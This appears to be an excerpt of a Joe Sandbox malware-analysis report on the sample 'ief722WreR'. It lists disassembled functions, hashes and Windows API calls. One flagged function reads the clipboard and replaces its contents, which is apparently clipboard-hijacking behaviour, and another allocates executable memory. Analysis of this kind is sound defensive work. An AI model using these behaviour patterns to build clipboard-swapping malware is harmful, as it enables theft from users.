Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 625e0f7f1e1b302f448508261efaf1e752b234688f5247d6a6466c6c1b929a9e
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 85D0123215512877D7003A94DC09BDE7B1CDF05B66F008011FB0DD9180C770954046E5

Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0040377C

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CC9

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327C3

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D00C

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD

Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103C7

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D

Function 00404333 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00404343

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
Instruction ID: fec367d8aa59221bd54f7e77a34cd6e8baa5892bd02020f9b8e7ed08d49e55ed
Opcode Fuzzy Hash: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
Instruction Fuzzy Hash: 71D067B1518611CEE764DF69E444656B7E4EF04310B24492FE4D9D2694E6749880CB44

Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 00AF994D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00AF999E

Memory Dump Source

Source File: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_af9000_ief722WreR.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 32e4bbfb631bc02c6e49a61d739bdbf8bd14f0aa3deb82673b5d65bce112ff57
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 07113C79A00208EFDB01DF98CA85E99BFF5AF08350F058095FA489B362D371EA50DF80

Non-executed Functions

Function 02481942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0248194D
Sleep.KERNEL32(00001541), ref: 02481957

Part of subcall function 0248CE77: _strlen.LIBCMT ref: 0248CE8E

OpenClipboard.USER32(00000000), ref: 02481984
GetClipboardData.USER32(00000001), ref: 02481994
_strlen.LIBCMT ref: 024819B0
_strlen.LIBCMT ref: 024819DF
_strlen.LIBCMT ref: 02481B23
EmptyClipboard.USER32 ref: 02481B39
GlobalAlloc.KERNEL32(00000002,00000001), ref: 02481B46
GlobalUnlock.KERNEL32(00000000), ref: 02481B70
SetClipboardData.USER32(00000001,00000000), ref: 02481B79
GlobalFree.KERNEL32(00000000), ref: 02481B80
CloseClipboard.USER32 ref: 02481BA4
Sleep.KERNEL32(000002D2), ref: 02481BAF

Strings

4#E, xrefs: 0248195D
i, xrefs: 024819C0

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction ID: b978c31468590a52dea869d75f85652d3b4ea07be727883c63709c40da631531
Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction Fuzzy Hash: 4A512431C107949AD311AFA4EC45BFD7774FF2A306F04522BD809A6162EB709686CB69

Function 02482361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0248239C
GetClientRect.USER32(?,?), ref: 024823B1
GetDC.USER32(?), ref: 024823B8
CreateSolidBrush.GDI32(00646464), ref: 024823CB
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024823EA
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0248240B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 02482416
MulDiv.KERNEL32(00000008,00000000), ref: 0248241F
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02482443
SetBkMode.GDI32(?,00000001), ref: 024824CE
_wcslen.LIBCMT ref: 024824E6

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction ID: a22004ffb4fdee9840a3042c472ed11f56d2906c634f0ab78efc99f85b126369
Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction Fuzzy Hash: 3571FD72910228AFDB22DF68DD85FAEB7BCEB09711F0041A5F509E6151DA70AF84CF24

Function 0043D678 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0043D7BE

Strings

1#SNAN, xrefs: 0043E9BD
1#IND, xrefs: 0043E9B6
1#QNAN, xrefs: 0043E9C4
1#INF, xrefs: 0043E9CB

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45

Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845

Strings

OCP, xrefs: 0043B7C2
ACP, xrefs: 0043B78C

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8

Function 024BB9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024BBCF4,?,00000000), ref: 024BBA6E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024BBCF4,?,00000000), ref: 024BBA97
GetACP.KERNEL32(?,?,024BBCF4,?,00000000), ref: 024BBAAC

Strings

ACP, xrefs: 024BB9F3
OCP, xrefs: 024BBA29

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: 45e7fa293ae2789865667484da2b8d3858e9d66a8975e282e1cd3e857f922556
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: CE217732E01105AAD7368F55D901BE777A6EF4AE5CB568066ED09D7300F732DA81C370

Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9

Function 024BBBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

Part of subcall function 024B2141: _free.LIBCMT ref: 024B21A0
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024BBCB5
IsValidCodePage.KERNEL32(00000000), ref: 024BBD10
IsValidLocale.KERNEL32(?,00000001), ref: 024BBD1F
GetLocaleInfoW.KERNEL32(?,00001001,024B0A1C,00000040,?,024B0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024BBD67
GetLocaleInfoW.KERNEL32(?,00001002,024B0A9C,00000040), ref: 024BBD86

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: 4421b78951f844526118e4bf4ae57a2b92a464ca9a4a4e065be02a0366c3c33b
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: F45170719002099AEB12DFA5DC40AFFB7B9EF1470AF14042FED04E7290EB719A458BB1

Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 0042EF48, 0042ED32, 0042EBC1
C, xrefs: 0042EAFD, 0042ECA8, 0042EECC, 0042EE66, 0042ECF6, 0042EC84

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID: C$C
API String ID: 0-238425240
Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94

Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
_wcschr.LIBVCRUNTIME ref: 0043B17C
_wcschr.LIBVCRUNTIME ref: 0043B18A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9

Function 024BB271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024B0A23,?,?,?,?,024B047A,?,00000004), ref: 024BB353
_wcschr.LIBVCRUNTIME ref: 024BB3E3
_wcschr.LIBVCRUNTIME ref: 024BB3F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024B0A23,00000000,024B0B43), ref: 024BB494

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: 3e2dc4b3e3bc5437148a8995ba2605b51944cf371a231a3a81260aeb0f76472d
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: 2C61A371A10606AADB26AB75DC45BFB73A9FF04718F14442FED099B280EBB4D541CBB0

Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99

Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49

Function 024AA63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0248DAD7), ref: 024AA732
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0248DAD7), ref: 024AA73C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0248DAD7), ref: 024AA749

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: c90aa944017c9d2be00a89346e304bdbf72c33aae30d3cec3e4f8b656447afc0
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: 4E31C57590132C9BCB21DF69DD88B9DBBB8BF18710F5042EAE40CA7260E7309B858F44

